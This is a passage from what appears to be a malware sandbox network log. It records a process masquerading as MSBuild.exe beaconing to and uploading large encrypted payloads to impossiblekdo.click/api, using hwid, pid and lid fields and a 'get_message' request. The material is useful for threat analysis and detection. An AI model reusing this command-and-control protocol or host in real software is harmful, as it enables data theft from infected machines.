22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6f 68 64 62 6b 6f 79 67 76 76 65 65 0d 0a 2d 2d 34 34 4a 47 51 55 37 Data Ascii: --44JGQU7AQPCFContent-Disposition: form-data; name="hwid"2682D890FD879A5C6D75A801C764DBB8--44JGQU7AQPCFContent-Disposition: form-data; name="pid"1--44JGQU7AQPCFContent-Disposition: form-data; name="lid"LPnhqo--ohdbkoygvvee--44JGQU7
2025-01-05 18:38:14 UTC	1126	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ti38onotoh2jad90mbrqdprca1; expires=Thu, 01 May 2025 12:24:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07g%2BEpqp85wD663voO19jp4NKNOzaUoIgVev%2BWP4eNfrSoyR4WRCH5Viv6RjLxJPDmOn6rZJR3p0WipZAJlEx7lKTmKK8zll6aBCPDyeJSmZg6LUysjG%2BPofqGXurtQcEQADd00T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5958ae8710f39-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1575&rtt_var=598&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2134&delivery_rate=1820448&cwnd=249&unsent_bytes=0&cid=6554f8ec41d161d1&ts=440&x=0"
2025-01-05 18:38:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:38:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:15 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D37LXU0W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569475 Host: impossiblekdo.click
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 2d 2d 44 33 37 4c 58 55 30 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 38 32 44 38 39 30 46 44 38 37 39 41 35 43 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 0d 0a 2d 2d 44 33 37 4c 58 55 30 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 33 37 4c 58 55 30 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6f 68 64 62 6b 6f 79 67 76 76 65 65 0d 0a 2d 2d 44 33 37 4c 58 55 30 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --D37LXU0WContent-Disposition: form-data; name="hwid"2682D890FD879A5C6D75A801C764DBB8--D37LXU0WContent-Disposition: form-data; name="pid"1--D37LXU0WContent-Disposition: form-data; name="lid"LPnhqo--ohdbkoygvvee--D37LXU0WContent-D
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 2a ff 34 f5 d2 9f cf 15 0d 94 62 37 24 b8 8c 9c 6f e1 83 a5 5e 2f d1 c2 7d 06 a2 3c a2 39 2d 4c d2 f3 40 ae 31 97 61 c0 a5 75 53 ef fb 09 8a e3 1b b7 46 f0 5d 7c ab 49 f7 17 f6 2a d3 c2 c3 c3 09 8b 0d 32 34 f4 4d c9 80 fa c6 3d 38 b0 89 63 9e 27 0f 1c 44 57 64 41 e4 41 ba a2 cd d3 a4 ca a0 52 3c ec 09 55 e0 85 53 f2 a1 5d 9c 32 d3 90 84 d6 69 ab 87 bd 88 cc 4a 9d a4 cf b0 3f 14 b4 7a 64 48 d2 83 b0 ae 8b 82 cb 85 82 ce de 03 3d 19 75 e2 e4 2e c5 db 1f 82 a3 6c 58 d5 be 7b ca a2 32 bd 78 80 62 40 f9 9b db 1e 41 bd 66 fb 84 cb ba 1e 4f 4b de 66 94 6b 16 5e d1 dc ed 7c f2 3e b9 bb f8 f6 44 45 fb eb 36 0c fc e5 aa a2 cb 47 90 d3 fd 8b d4 cc 2b 71 04 4f 13 1d 9b f1 74 b5 b1 63 d8 04 1e 36 15 06 39 1f fa 18 15 c1 a6 c9 77 90 13 76 13 a2 9d 14 5b ff 53 9f 0d 60 Data Ascii: 4b7$o^/}<9-L@1auSF]\|I24M=8c'DWdAAR<US]2iJ?zdH=u.lX{2xb@AfOKfk^\|>DE6G+qOtc69wv[S`
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 84 76 07 28 da 92 07 03 fb 76 1a 9d 9a 7f 99 d6 4b c7 78 ae f9 c6 0f 9f 9f 6f f1 7b bb 55 ee 52 da ea e4 b8 f5 79 47 ac 7a 63 91 38 df 72 ab fe 86 75 89 ab 5b e9 a9 1d a9 17 d9 ae 79 e4 d9 7a f5 79 5d f3 9a 87 2d 8b ea 41 b8 98 44 1e 23 9f 7a 1f 45 fb ca 69 a1 4b f0 e4 68 29 6a d9 ce a5 aa f0 8f 84 3c b0 71 74 37 80 c8 04 e3 26 25 2f 49 a4 79 6a 9d e7 d4 78 87 3a 9c db 93 53 ad e7 42 da bf f7 81 3a de be 99 12 62 10 58 59 81 67 2d 05 5e 5d ab b2 43 80 ad 5a f7 a4 62 12 ec c6 d5 ae 1c d9 1b f2 40 c8 54 5e f2 e5 56 eb e9 38 3e 4a 9d d8 4d fe 98 c3 40 be 83 5e 31 fe d8 b3 ab 20 a3 9d 2b ab 58 a1 7c fc 99 53 7b 46 76 85 06 3b 8d be 39 b1 32 ef 3f 8e 15 49 07 8b 7d cf 77 0f b1 47 1e 53 fe 54 2c 9b fc b1 62 31 bc 79 c5 af 4e d4 e1 b5 8d d6 f2 2b cf e7 51 f3 46 Data Ascii: v(vKxo{URyGzc8ru[yzy]-AD#zEiKh)j<qt7&%/Iyjx:SB:bXYg-^]CZb@T^V8>JM@^1 +X\|S{Fv;92?I}wGST,b1yN+QF
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 8f 9d 82 98 e1 eb 4c 76 5c 71 f7 95 32 50 34 39 3c 4a 79 59 e8 42 b1 7a f8 df e9 f2 5e 8f 09 dc 97 17 10 57 a3 0f 15 ac 28 f3 86 98 1e 61 f9 3c a5 19 fa 64 84 26 c5 c7 63 67 c8 ec 11 4e 6c 6a 44 c6 fb ef c7 e7 22 1e 7d 25 c3 60 0b 41 3f 49 2e 65 f6 c6 f3 ab 25 a5 14 04 a9 32 ec d7 8f d4 44 ac 74 ab fb 72 77 b3 91 d2 e3 ee a1 ea 53 39 15 a4 03 83 14 fa f0 97 09 fc c6 37 75 8b 07 23 02 35 a8 88 da b8 2b 4f f7 c5 39 3f 2d e7 13 e0 82 71 d1 f2 3d 8f a3 c9 df ac be fc 4c 2a e3 be 65 b9 78 4c d6 48 5d c8 b8 13 7a cb fb f6 4f d3 73 ac b4 68 33 e3 cc e9 02 ce 1a 39 7e 4b 11 3d e5 80 38 6f 32 59 31 ef 57 c4 1f 02 9e 09 f5 2c 5e f1 2a 28 36 f9 4f 6d 7a 8d 7c 44 86 40 c1 35 2b ff bd 18 17 be 58 9e b6 95 84 cd 53 9a c7 0f f7 a4 de b8 33 15 a1 69 f6 82 19 64 f0 4e 3c Data Ascii: Lv\q2P49<JyYBz^W(a<d&cgNljD"}%`A?I.e%2DtrwS97u#5+O9?-q=LexLH]zOsh39~K=8o2Y1W,^(6Omz\|D@5+XS3idN<
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 2e 59 6b 4d 91 4c 9e 9d ec 8c c2 94 72 3a 74 73 89 b0 3f 5d 18 cf 98 eb 5b d9 91 a1 b5 58 32 f3 b1 ec ed b1 e5 06 d3 57 d5 e4 30 49 ac 0a 79 64 e9 ea 15 d7 b0 64 07 ad 2c ac 52 34 39 d0 87 6b f8 e5 8a fc da 6f 4f 5c 06 cc 1d 96 55 c1 b6 f8 8a 8d d0 8c bd e5 cf 6a 5f 21 0a 19 cf 9f c2 7b 2d fc 36 ad ad 5b 5b 33 ab da 87 d8 ec da 6b 1d 3c fd 3c ac 73 e9 8e 34 b6 db 87 ae b3 23 e2 74 ea 2a b4 e6 87 a7 71 e2 3e 78 a1 f6 4d 9c 43 b7 c8 6a 91 55 36 1d 15 8f e2 b8 9c 99 c6 86 8d b4 f1 6e 83 99 4b 07 36 3f 78 1b d3 fa 11 31 c5 78 bb c8 cc 93 11 5e 3f 0a 03 64 8f 3e 38 75 e0 99 3e 8b 5e 21 f6 4b bc 65 84 1e 85 7b 00 c4 92 cc 32 10 b9 c0 6e 0a 79 cb 4f 0b f6 2a 01 d1 63 ff d5 c7 b2 8b 7f fc 9e 30 ec 72 e3 27 7c 03 7f 4c 35 dc 60 69 cf 7f 24 cd 0b fd fe 71 1b ac 52 Data Ascii: .YkMLr:ts?][X2W0Iydd,R49koO\Uj_!{-6[[3k<<s4#tq>xMCjU6nK6?x1x^?d>8u>^!Ke{2nyOc0r'\|L5`i$qR
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 00 4e de f6 cf 7c c0 38 2d e4 59 42 ee 80 50 ea 58 27 05 b3 37 5e f9 69 a7 81 df 18 3d 77 2f a0 dd cd 33 4c 5e d0 c6 38 c8 27 ec 7c a0 64 7d 11 77 f9 b1 b5 8c 80 b7 3f f6 4a d2 65 cf 81 a3 3f af a1 2b a7 c9 e4 e8 d0 cb 02 c0 43 11 4c e9 72 e4 b6 03 f9 58 f4 ff 6d 9d 74 06 9e 8c fe 23 68 38 ad 1c 18 22 e9 48 04 69 ec 1c 4f 6c 13 45 45 9d dc c6 84 e1 13 bf e4 99 e3 00 86 11 cd de 2d 49 23 82 9f d5 d9 c9 7b 7d 4f b9 8e a5 ce 48 7d 5b ff ea cf 77 ce 77 a1 77 97 93 96 66 45 f6 a4 70 8b c5 34 53 50 6c e3 e4 1f 7d 68 da 04 1e 18 ce 56 12 fc 7b 50 b1 59 44 e8 b5 df 1d 52 5b da 51 88 9c a1 34 a3 dc bb 28 03 27 3d 9b b4 ed a3 97 0a d4 7d 0e 78 31 e8 e0 81 fa fd 25 be b0 1c b3 c8 4a 8f 34 2b 40 e1 68 fb e5 e6 32 9b 38 94 1e d4 d4 2a 4b e8 88 9b d2 50 55 f2 6d 5e 84 Data Ascii: N\|8-YBPX'7^i=w/3L^8'\|d}w?Je?+CLrXmt#h8"HiOlEE-I#{}OH}[wwwfEp4SPl}hV{PYDR[Q4('=}x1%J4+@h28*KPUm^
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 7d 5e 8e 13 32 f3 91 f1 21 22 60 68 f7 81 26 b5 b9 d6 15 d7 49 f1 ba 0a 9d cd 89 5e 53 c9 7f 98 83 9d c1 ab 0a fd 7f b2 7d aa 1e 77 0c 04 ec 24 cf 88 08 ee c4 e7 ed ee 22 ee c6 80 63 6c 53 50 f6 67 dc e1 19 c5 88 6e b1 c4 7b 5a a2 9a 6b ab 71 eb fa 6c bf 82 82 9e 1f 79 fd 36 85 b7 98 59 5d 95 be d9 ff 69 6c b5 85 e3 76 82 37 93 76 6c 73 97 6d 43 f2 f0 f4 1d e0 7a fa b6 2f e5 22 86 eb 37 ed f2 9b 7b 78 70 80 e8 f0 71 74 1f f0 1e 5f 57 da ec da 5c b5 19 3c 59 05 9d 52 6c 5f bf 22 05 fc 0c 52 23 43 80 1f 12 ff 2f e1 60 97 d7 0e ec 4e 99 39 35 06 ec 92 13 f2 f5 69 4e c8 a2 89 66 0d 15 55 5d 77 ac 6b 46 e0 d0 09 e9 9a 5e e6 c8 9b 38 e7 1d db 72 fb ff fb f7 96 df 75 f2 17 2b a7 45 f4 8f 6d 22 4c 66 4a 69 28 c8 d9 c6 ce 9a d8 bd 54 d4 fc e9 66 fa 95 db 3b af 04 Data Ascii: }^2!"`h&I^S}w$"clSPgn{Zkqly6Y]ilv7vlsmCz/"7{xpqt_W\<YRl_"R#C/`N95iNfU]wkF^8ru+Em"LfJi(Tf;
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 87 89 a6 87 b8 8b 34 17 e2 31 ab 58 79 cc 72 d3 72 c3 28 aa 1d d3 d1 72 10 d8 fb fc f2 56 1d 78 48 1b 0f 9f 18 80 0d e5 86 b0 99 df 4f fb f3 e2 68 44 d0 df cb ef 2e 13 7e 18 9d 16 8f fe e4 87 54 ed bf 82 88 1a 17 28 0c 9e b5 43 31 d7 61 08 be 47 2e 5f 62 53 97 f8 d4 53 2e 8c cd f7 78 5f 2f 83 fb da ce dc 4d a2 2e 0c 30 29 03 09 a8 fa e7 36 fa ea 16 4f 22 8d 9b 63 bd 3c fb f5 84 0e ed e3 b0 09 e8 c5 d6 86 1e db 5b 1b 4e 3e 47 3b 24 0e 3e 08 56 2a 0b 0c bd b5 da ff f3 51 dd d6 c5 df 86 13 fc e0 77 34 65 44 81 b2 a9 85 2d 71 03 ee 14 67 1e 60 7a 03 a4 28 cc 7a bc 16 ee 5a d0 d4 33 c8 5c 49 06 29 ea c5 9c 2c 09 03 af f4 90 e4 a1 33 c0 fd 45 e8 c9 d0 e2 8f e0 d3 51 e8 96 c4 3e 23 45 7e 88 53 e6 ec 6d 2d 5b c8 d1 90 f3 ba 0a 13 82 14 7a ff 96 26 2b 43 2e 36 62 Data Ascii: 41Xyrr(rVxHOhD.~T(C1aG._bSS.x_/M.0)6O"c<[N>G;$>V*Qw4eD-qg`z(zZ3\I),3EQ>#E~Sm-[z&+C.6b
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: 93 49 e9 34 6d f1 91 60 bb 5c 19 9d e4 85 9f 48 f7 62 2f 8f e2 8a dd c1 f8 12 15 de 52 fe c6 f9 e3 36 ad 69 b7 d1 d3 23 ff 9f 4d f7 7f 16 bb 79 9c c1 1f 4f d1 d6 a3 73 4c 94 6a 43 90 5e 36 30 fb 3d fb 12 ae 44 2b d0 c3 c6 3f 89 ed 46 5c aa 08 7a f5 6e bd c2 3c b6 5c f7 aa c6 14 6d 7e 3d 90 2b 90 4a d1 d4 3f a9 1c e4 3e a7 7f a1 f2 92 1b 81 1c 59 a6 a5 7d 13 d9 e1 0e 1a 06 45 a4 42 2f 72 e2 6a 5e 28 e5 bf 0f 58 3d 0a 3d 5b 04 29 65 ec 6f 7f e3 79 56 30 65 50 e7 b7 53 ad 79 45 f5 ea bf 2c 87 c8 1c 77 e4 2e 27 12 92 8c 2b 99 ca e0 15 bc a4 10 11 e3 cb aa ba 0f 7e eb 92 c7 38 b5 c4 45 66 e4 96 33 7a 86 e3 6c cc 64 65 ba e1 4a 20 e6 37 e1 a5 ac 0f 7a ed ac 09 a6 71 07 ec e3 9f 06 9d 35 8d 72 c2 17 18 05 8d 42 32 5f 67 cb c9 90 78 80 3f 3f c0 2e 71 80 e7 fc d6 Data Ascii: I4m`\Hb/R6i#MyOsLjC^60=D+?F\zn<\m~=+J?>Y}EB/rj^(X==[)eoyV0ePSyE,w.'+~8Ef3zldeJ 7zq5rB2_gx??.q
2025-01-05 18:38:15 UTC	15331	OUT	Data Raw: ca 3b c9 6e 02 4c 6b 52 ca d7 8f ef 41 5c 9c 40 75 4c 61 e8 4d 2b 6e a5 90 72 1a 12 f8 6d 25 3e 81 21 20 2b 7e 72 95 3f 9d 6f 27 6d a9 92 2d 92 ec 71 d7 ae a3 5f dc 43 45 ae 7c 5f ce dd 47 14 04 65 b9 78 5c b2 04 1e 41 69 8c dc 8d b6 65 65 b4 0a 0b fb ec e4 15 0a 2f 3d dc 07 2b 23 4c f8 71 ba 2e 42 21 4b f1 59 db 8d 10 5a ec 0d 54 94 a6 d0 77 27 58 50 a0 be c5 1c a2 19 1c 85 c3 00 8c 8a 70 ea 63 0d c4 3a 17 c9 ac 9d c8 25 78 64 3e dc 1f d7 dd ef fd ef 62 d1 61 ec 47 42 16 b1 0d 33 d9 7a ff 2c f5 ce 5f 89 e1 f3 ce a4 c2 6e d9 97 cc f6 0f f8 63 a8 70 b9 29 2f 54 ef 40 b1 76 ed bb 54 12 31 33 9a 2c 8f 39 bb 16 bf 07 38 37 31 52 21 ba a4 54 88 ef f2 1d da 42 9f d7 c2 95 f9 1d 62 40 9a e3 1c cc 5e 66 7b db 2f bc aa 59 99 a1 0d f7 55 92 71 78 26 52 5f 4b 43 e0 Data Ascii: ;nLkRA\@uLaM+nrm%>! +~r?o'm-q_CE\|_Gex\Aiee/=+#Lq.B!KYZTw'XPpc:%xd>baGB3z,_ncp)/T@vT13,9871R!TBb@^f{/YUqx&R_KC
2025-01-05 18:38:17 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6lag4vn1eaqheagqalf61huri4; expires=Thu, 01 May 2025 12:24:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qVkLW4U3NVjJxTsECG%2B5jEONq8bydra7t9BP7dvJNFJnskTWNnSopRefJ0x8mZLN5uWtZA323gguuRn7ZZ0j5fzxlo%2BOUmY05kkWpE5rVm%2Fvy0n0wRT%2FQflQypmqCVk1679qRw2M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59592ad710f6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1452&rtt_var=565&sent=197&recv=587&lost=0&retrans=0&sent_bytes=2848&recv_bytes=572015&delivery_rate=1902280&cwnd=180&unsent_bytes=0&cid=67741c5a4cffbbce&ts=1631&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49719	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:17 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: impossiblekdo.click
2025-01-05 18:38:17 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6f 68 64 62 6b 6f 79 67 76 76 65 65 26 6a 3d 26 68 77 69 64 3d 32 36 38 32 44 38 39 30 46 44 38 37 39 41 35 43 36 44 37 35 41 38 30 31 43 37 36 34 44 42 42 38 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--ohdbkoygvvee&j=&hwid=2682D890FD879A5C6D75A801C764DBB8
2025-01-05 18:38:18 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fethklcikknbtuvq146elsf9i5; expires=Thu, 01 May 2025 12:24:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Isnosz8WY4Ut5y3vMrMt6n3hBCbzu6bDXw%2FE%2BXcRNXT4z2TxE8mHIIHqP8Cwzd9CpzzC9KbBfjPsAkQ93R%2BCZQNyVQLXZt6kC03q7RrHkHiOKptTxYeJ5aYjADxjwdl78dE%2BJhWD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5959ffb021a28-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=2051&rtt_var=774&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=992&delivery_rate=1423695&cwnd=138&unsent_bytes=0&cid=fae5675f6fbd022f&ts=513&x=0"
2025-01-05 18:38:18 UTC	242	IN	Data Raw: 62 66 62 0d 0a 58 46 68 52 37 73 38 49 71 2b 68 45 4b 44 68 77 68 4a 58 76 70 69 65 6d 44 41 61 33 6d 32 69 39 4a 59 72 5a 6a 72 66 70 69 56 45 48 49 33 4f 49 75 79 71 52 32 57 67 4b 58 56 4b 2b 70 4d 4f 45 51 34 51 32 4a 4f 2f 36 43 75 64 76 34 72 58 35 7a 74 33 4e 61 53 77 30 41 4d 57 47 51 70 2b 44 45 68 39 2b 50 74 66 30 75 38 64 79 7a 31 41 70 38 4f 73 4d 2b 68 7a 43 36 75 66 32 67 4d 55 55 44 51 52 2b 70 59 70 6c 37 4b 41 41 5a 46 38 67 37 66 69 35 34 68 50 42 59 6d 2f 6c 77 78 76 6f 46 4d 43 70 77 4d 65 36 78 57 6b 2b 4e 47 47 4d 2f 32 37 4f 6f 51 64 68 53 79 61 32 2b 4e 33 31 66 76 78 76 53 38 4c 61 4e 4a 4a 75 30 49 7a 65 33 71 72 73 47 78 6f 39 4b 62 71 61 5a 63 44 61 4b 47 46 4f 43 50 58 4e 76 64 42 31 6e Data Ascii: bfbXFhR7s8Iq+hEKDhwhJXvpiemDAa3m2i9JYrZjrfpiVEHI3OIuyqR2WgKXVK+pMOEQ4Q2JO/6Cudv4rX5zt3NaSw0AMWGQp+DEh9+Ptf0u8dyz1Ap8OsM+hzC6uf2gMUUDQR+pYpl7KAAZF8g7fi54hPBYm/lwxvoFMCpwMe6xWk+NGGM/27OoQdhSya2+N31fvxvS8LaNJJu0Ize3qrsGxo9KbqaZcDaKGFOCPXNvdB1n
2025-01-05 18:38:18 UTC	1369	IN	Data Raw: 6b 31 68 2f 76 49 51 36 42 4c 6d 73 38 58 31 68 38 77 6d 4e 32 73 31 70 71 4e 65 30 74 38 6d 45 55 38 67 76 66 4c 45 78 30 50 31 59 31 62 69 38 6c 6a 46 61 66 4f 39 36 50 57 48 2f 47 51 6f 62 43 47 47 76 58 7a 76 70 78 56 6a 45 30 66 77 37 37 2f 70 54 35 4e 6e 4e 75 2f 2f 57 34 35 6d 77 36 33 35 30 62 75 37 48 57 51 36 59 49 4b 44 4f 4d 32 6d 44 57 39 31 41 39 50 37 6f 4e 56 79 34 31 5a 6c 2b 75 34 70 34 51 72 42 67 39 76 6e 6d 73 6f 30 46 6a 59 77 32 4a 74 4e 7a 6f 4e 32 51 33 45 47 2f 4f 53 33 78 46 48 30 4e 54 4c 51 30 67 48 46 66 65 69 37 31 50 32 42 35 54 59 6c 62 42 58 57 76 32 54 36 77 77 31 69 44 42 76 57 6f 71 6e 43 64 4d 64 59 5a 2b 4c 59 4e 4a 4a 69 35 65 44 4a 6a 71 47 36 4f 42 30 78 48 61 69 74 65 4e 2b 44 4b 57 39 67 4e 4d 6a 79 76 39 77 56 Data Ascii: k1h/vIQ6BLms8X1h8wmN2s1pqNe0t8mEU8gvfLEx0P1Y1bi8ljFafO96PWH/GQobCGGvXzvpxVjE0fw77/pT5NnNu//W45mw6350bu7HWQ6YIKDOM2mDW91A9P7oNVy41Zl+u4p4QrBg9vnmso0FjYw2JtNzoN2Q3EG/OS3xFH0NTLQ0gHFfei71P2B5TYlbBXWv2T6ww1iDBvWoqnCdMdYZ+LYNJJi5eDJjqG6OB0xHaiteN+DKW9gNMjyv9wV
2025-01-05 18:38:18 UTC	1369	IN	Data Raw: 4c 32 41 34 39 4a 77 36 2f 32 78 72 48 62 4a 77 35 68 5a 59 6d 47 59 64 4f 77 4a 55 70 69 4f 75 7a 35 6d 4e 38 54 34 6a 52 32 32 38 70 44 39 47 2b 2b 73 74 69 41 72 38 63 43 50 51 77 77 75 36 5a 55 68 4b 38 30 54 48 39 4a 7a 4b 61 47 35 30 37 71 53 6d 4c 48 37 77 50 51 59 74 4b 64 77 74 43 35 38 44 77 4b 48 47 57 4a 6f 57 48 35 73 44 64 39 43 54 72 30 32 35 2f 31 61 35 35 74 61 6f 66 35 57 4e 74 41 77 35 72 48 78 4c 2b 37 50 47 34 4c 43 4c 53 73 52 64 36 70 47 41 64 7a 4b 74 48 46 68 75 56 43 37 45 70 6a 7a 38 38 39 30 45 36 34 74 63 66 42 6b 66 67 4a 44 69 34 44 31 2f 74 76 34 6f 45 38 63 46 6b 53 33 74 2b 48 79 6c 44 66 4f 45 4b 50 36 77 54 73 44 73 4f 54 75 74 79 2f 76 68 63 53 43 7a 43 36 72 6c 33 43 74 47 74 76 53 42 54 44 72 4b 65 56 54 75 64 6c 53 Data Ascii: L2A49Jw6/2xrHbJw5hZYmGYdOwJUpiOuz5mN8T4jR228pD9G++stiAr8cCPQwwu6ZUhK80TH9JzKaG507qSmLH7wPQYtKdwtC58DwKHGWJoWH5sDd9CTr025/1a55taof5WNtAw5rHxL+7PG4LCLSsRd6pGAdzKtHFhuVC7Epjz8890E64tcfBkfgJDi4D1/tv4oE8cFkS3t+HylDfOEKP6wTsDsOTuty/vhcSCzC6rl3CtGtvSBTDrKeVTudlS
2025-01-05 18:38:18 UTC	94	IN	Data Raw: 53 62 74 43 4d 77 2b 32 4e 75 41 41 6f 43 68 71 73 69 6c 48 4d 70 58 56 68 54 67 6a 74 7a 4a 79 65 53 74 63 37 52 65 4c 56 4d 66 6c 4a 34 62 53 38 35 4b 44 4d 5a 6d 67 4b 59 74 61 68 53 5a 6d 2b 4e 6d 6c 4b 52 4e 53 2b 6c 64 35 6f 38 30 63 30 36 37 51 51 2b 33 33 75 72 50 66 0d 0a Data Ascii: SbtCMw+2NuAAoChqsilHMpXVhTgjtzJyeStc7ReLVMflJ4bS85KDMZmgKYtahSZm+NmlKRNS+ld5o80c067QQ+33urPf
2025-01-05 18:38:18 UTC	1369	IN	Data Raw: 32 61 39 39 0d 0a 5a 76 4c 41 4e 63 7a 78 68 32 5a 34 39 6d 59 6b 79 55 55 34 39 2f 76 69 5a 36 30 7a 41 62 30 37 52 77 67 6e 59 63 73 61 71 33 64 61 6a 38 42 38 56 45 52 53 39 35 45 54 41 70 43 4e 4d 51 68 58 48 78 61 33 65 46 66 4e 63 55 64 62 79 4a 66 70 31 37 4b 6a 33 78 5a 37 74 61 51 67 43 4e 49 6e 37 5a 74 69 59 4a 31 39 2b 51 76 44 61 67 39 56 53 39 33 78 2f 67 74 4d 66 2b 30 79 35 74 64 4b 59 72 63 49 4c 4b 54 30 66 74 76 64 4d 34 34 6b 32 61 67 74 43 77 2b 4f 4b 31 47 47 66 58 32 54 6b 6f 79 62 34 53 2b 57 6f 2f 59 50 63 77 57 49 31 47 54 69 69 69 6a 2f 68 69 52 45 66 66 30 50 47 30 74 33 36 43 4a 46 59 61 64 57 6f 43 73 52 4a 79 4a 50 70 2f 74 6e 2f 47 32 6f 43 42 49 76 33 55 63 53 44 4a 68 46 4a 47 74 57 6e 71 74 52 51 6c 31 5a 30 35 74 49 2b Data Ascii: 2a99ZvLANczxh2Z49mYkyUU49/viZ60zAb07RwgnYcsaq3daj8B8VERS95ETApCNMQhXHxa3eFfNcUdbyJfp17Kj3xZ7taQgCNIn7ZtiYJ19+QvDag9VS93x/gtMf+0y5tdKYrcILKT0ftvdM44k2agtCw+OK1GGfX2Tkoyb4S+Wo/YPcwWI1GTiiij/hiREff0PG0t36CJFYadWoCsRJyJPp/tn/G2oCBIv3UcSDJhFJGtWnqtRQl1Z05tI+
